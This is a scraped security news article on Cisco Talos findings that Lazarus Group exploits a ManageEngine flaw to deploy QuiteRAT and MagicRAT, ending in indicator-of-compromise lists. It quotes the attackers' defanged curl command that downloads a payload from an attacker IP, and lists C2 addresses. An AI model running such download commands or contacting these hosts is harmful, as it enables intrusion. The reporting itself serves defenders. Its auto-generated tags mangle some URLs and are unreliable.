# Lazarus Group Exploiting ManageEngine Flaw to Deploy MagicRAT Malware
## North Korean state-sponsored threat actor Lazarus Group is actively exploiting the ManageEngine flaw (CVE-2022-47966) to deploy MagicRAT malware
## Information:

+ Link: https://cybersecuritynews.com/?p=39426
+ Source: Cyber Security News
+ Author: Guru
+ Date published: 25 August 2023, 14:32
+ Date scraped: 25 August 2023, 15:01

## Article:
![Main article image](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rKCbFYgVowHHIbI4PbEZQYlGVb70iSxwvGPTmv7eNco59NNIzJiILd_OwjYNrLChq7f6ScTtNsrPZjhYVnVpfeIVERtGQ6Gj9geLsrJMxl5o5U_lcViN5pBgAdGt8VOFmN1iElvArTIN9QSuFAkJuLm1zsHuLSULEoRMQq0M01bB-WVJ9i-vfw4qxbG2/s16000/Lazarus%20Group%20Exploiting%20ManageEngine%20Flaw%20to%20Deploy%20MagicRAT%20malware.webp)


According to Cisco Talos, the Lazarus Group, backed by North Korea, is actively attacking the backbone infrastructure of the internet and entities in the healthcare sector across Europe and the US.


This event clearly shows how they are active and consistently leveraging the same infrastructure, as it marks their third campaign in under a year.






Recently, in a report shared with Cyber Security News, security analysts at Cisco Talos found and confirmed that the North Korean state-sponsored threat actor Lazarus Group is actively exploiting the ManageEngine flaw ([CVE-2022-47966](https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html)) to deploy MagicRAT malware.


**Lazarus Group Exploiting ManageEngine Flaw**
----------------------------------------------


In Europe, the operators of Lazarus Group attacked an internet backbone infrastructure provider in early 2023 to deploy the QuiteRAT malware.


The researchers observed that from a malicious URL, to immediately deploy the QuiteRAT binary, the threat actors used the cURL command:-



```
curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe
```

The downloaded binary triggers QuiteRAT through Java, activating it on the server. It then sends system info to [C2 servers](https://cybersecuritynews.com/command-and-controlc2-server/) and waits for the commands for execution via child cmd.exe.



![](https://lh5.googleusercontent.com/HkXRKAZpb3F9xt4myU7-_H2l56btgdt0esMEF-xLhBVN0NM74UdyybxbOPZFQVT0RnVzCcBRmLtEE5nepvjqGMsiwWIARc9PZPZZOFuUuP1GLGMHv0RlM-P1Nu8ltWsaGCxaY00eUb0vy6_JS6d7fxM)Infection Chain (Source – Cisco Talos)


The QuiteRAT is a simple RAT ([Remote Access Trojan](https://cybersecuritynews.com/enterprise-remote-access-software/)) that employs Qt libraries without a GUI. Besides this, the use of embedded Qt libraries and the lack of a Graphical User Interface (GUI) are the two key similarities between QuiteRAT and MagicRAT.


Considering its traits like the Qt framework use, the QuiteRAT is linked to the MagicRAT family. However, the disclosure of a fresh campaign highlights the ManageEngine ServiceDesk flaw (CVE-2022-47966) for QuiteRAT deployment.


Here below, we have mentioned all the types of data that are gathered by this implant after successful deployment:-


* MAC addresses
* IP addresses
* Current user name of the device


The malware also secures the networking settings by encoding the strings with XOR (0x78) and base64, which contain the C2 URLs and extended URI parameters.



![](https://lh3.googleusercontent.com/8h4EwU7wDBok3JcQ5gukjY1rPsAvWkIhDyyo95Uxg_uajw4J_IgSb88tlPpZ1OEysYTK6nqd-A2wFdGsHAUrf8DNyaQQiuXgNaztUCrsherzVqJLrtv613zRS8Stjt6ce0qy-EHcDjDpnYG1sxvGikw)Configuration strings (Source – Cisco Talos)


The latest version of MagicRAT was spotted in the wild in April 2022, the most recent version known yet. So, the emergence of QuiteRAT in May 2023 indicates the actor’s shift to a smaller Qt-based approach.


QuiteRAT, an evolution of MagicRAT, shrinks to 4-5MB, unlike the bulky 18MB MagicRAT, by using fewer Qt libraries. Unlike MagicRAT’s built-in persistence, QuiteRAT relies on C2 server commands.


They both share Qt roots, command execution, string obfuscation, and sleep functionality, indicating QuiteRAT’s roots.


**IOCs**


Here below, we have mentioned all the IOCs:-


**Hashes**



```
**QuiteRAT:** ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
```

**Networks IOCs**



```
146[.]4[.]21[.]94
hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat
hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php
hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php
hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php
```





## Tags:
***CVE's***: CVE-2022-47966
***ipv4-adresses***: 146.4.21.94
***urls***: http://146.4.21.94 http://hxxp://146.4.21.94/tmp/tmp/logs.php http://hxxp://146.4.21.94/tmp/tmp/comp.dat http://\users\public\notify.exe http://hxxp://146.4.21.94/tmp/tmp/log.php http://hxxp://ec2-15-207-207-64.ap-south-1.compute.amazonaws.com/resource/main/rawmail.php
***SHA256-hash***: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6

### Autogenerated tags:
[[quiterat]] [[magicrat]] [[talos]] [[manageengine]] [[malware]] [[c2]]
